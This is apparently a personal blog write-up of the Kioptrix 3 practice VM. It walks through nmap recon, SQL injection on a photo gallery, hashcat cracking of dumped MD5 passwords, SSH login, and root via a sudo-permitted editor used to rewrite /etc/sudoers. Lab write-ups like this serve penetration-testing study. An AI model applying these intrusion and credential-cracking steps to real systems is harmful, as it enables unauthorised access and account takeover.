Overview
Kioptrix 3 is B2R VM designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise
Vulnerabilities Exploited:
- SQL Injection
- Password reuse
- Sudo Misconfiguration
Lab Setup:
- VMWare workstation for Virtual Machines
- Kali Linux VM in Bridge mode
- Kioptrix 3 in Bridge mode
Tools Used:
- Kali Linux VM
- netdiscover
- nmap
Reconnaissance/Scanning
I used netdiscover to find ip address of target VM.
#netdiscover
Target VM IP Address: 192.168.8.105
I modified my /etc/hosts file as guided by author of the VM. https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
root@kali:~# cat /etc/hosts 192.168.8.105 kioptrix3.com
Next, i used namp to find opened ports/services on target machine.
root@kali:~# nmap -p- -A 192.168.8.105 Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-30 00:02 EDT Nmap scan report for 192.168.8.105 Host is up (0.00026s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA) |_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Ligoat Security - Got Goat? Security ... MAC Address: 00:0C:29:62:9A:C5 (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.26 ms 192.168.8.105 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.15 seconds
Guess what, Found a website hosted on port 80. Lets explore website in browser…
In comments, found gallery admin panel.
So, title of login page tells me that target gallery is by Gallarific Photo Gallery.
Exploitation
quick googling display sql injection in Gallarific Photo Gallery.
Using SQL Injection, dumped plain text admin username and password.
and logged into Gallarific Gallery
Ooops, no further proceeding this way. We can not do much with this admin panel.
Lets use sql injection to read local file system. Reading /etc/passwd, /etc/group, /etc/my.cnf is successful, but no other local configuration file is readable.
Lets check for other databases and tables using sql injection.
Found 2 default databases, with only “gallery” as user created database. Lets find tables in gallery database.
Hm… dev_accounts seems interesting table name. Lets find columns…
and dump username:password
I cracked these hashes with hashcat.
root@kali:~# hashcat -m 0 -a 0 --force -o found1.txt hashes.txt /root/rockyou.txt hashcat (v4.0.1) starting... OpenCL Platform #1: The pocl project ==================================== * Device #1: pthread-Intel(R) Core(TM) i7-3520M CPU @ 2.90GHz, 512/1493 MB allocatable, 4MCU Hashes: 2 digests; 2 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers: * Zero-Byte * Early-Skip * Not-Salted * Not-Iterated * Single-Salt * Raw-Hash Password length minimum: 0 Password length maximum: 256 ATTENTION! Pure (unoptimized) OpenCL kernels selected. This enables cracking passwords and salts > length 32 but for the price of drastical reduced performance. If you want to switch to optimized OpenCL kernels, append -O to your commandline. Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. Watchdog: Temperature retain trigger disabled. * Device #1: build_opts '-I /usr/share/hashcat/OpenCL -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=0 -D _unroll' Dictionary cache hit: * Filename..: /root/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 - Device #1: autotuned kernel-accel to 1024 - Device #1: autotuned kernel-loops to 1 [s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => Session..........: hashcat Status...........: Cracked Hash.Type........: MD5 Hash.Target......: hashes.txt Time.Started.....: Wed May 30 05:06:33 2018 (5 secs) Time.Estimated...: Wed May 30 05:06:38 2018 (0 secs) Guess.Base.......: File (/root/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 3110.3 kH/s (0.68ms) Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 10838016/14344385 (75.56%) Rejected.........: 0/10838016 (0.00%) Restore.Point....: 10833920/14344385 (75.53%) Candidates.#1....: MasterFlick -> March3490 HWMon.Dev.#1.....: N/A Started: Wed May 30 05:06:32 2018 Stopped: Wed May 30 05:06:39 2018 root@kali:~# cat found1.txt 5badcaf789d3d1d09794d8f021f40f0e:starwars 0d3eccfb887aabd50f243b3f155c0f85:Mast3r root@kali:~#
//dreg:Mast3r // dreg dont have sudo privilege,
//loneferret:starwars // loneferret have sudo privilege
root@kali:~# ssh loneferret@192.168.8.105 loneferret@192.168.8.105's password: Permission denied, please try again. loneferret@192.168.8.105's password: Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ Last login: Wed May 9 15:35:14 2018 from 192.168.8.103 loneferret@Kioptrix3:~$
Privilege Escalation
loneferret@Kioptrix3:~$ cat CompanyPolicy.README // company policy says, use sudo ht:) Hello new employee, It is company policy here to use our newly installed software for editing, creating and viewing files. Please use the command 'sudo ht'. Failure to do so will result in you immediate termination. DG CEO loneferret@Kioptrix3:~$ sudo -l User loneferret may run the following commands on this host: (root) NOPASSWD: !/usr/bin/su (root) NOPASSWD: /usr/local/bin/ht loneferret@Kioptrix3:~$ ls -al /usr/local/bin/ht -rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht loneferret@Kioptrix3:~$ sudo ht
Lets edit /etc/sudoers to grant loneferret sudo access
Lets confirm sudo access
loneferret@Kioptrix3:~$ sudo su [sudo] password for loneferret: root@Kioptrix3:/home/loneferret# id uid=0(root) gid=0(root) groups=0(root) root@Kioptrix3:/home/loneferret# whoami root root@Kioptrix3:/home/loneferret#
and got root access!!!
Zeeshan Sahi's blog 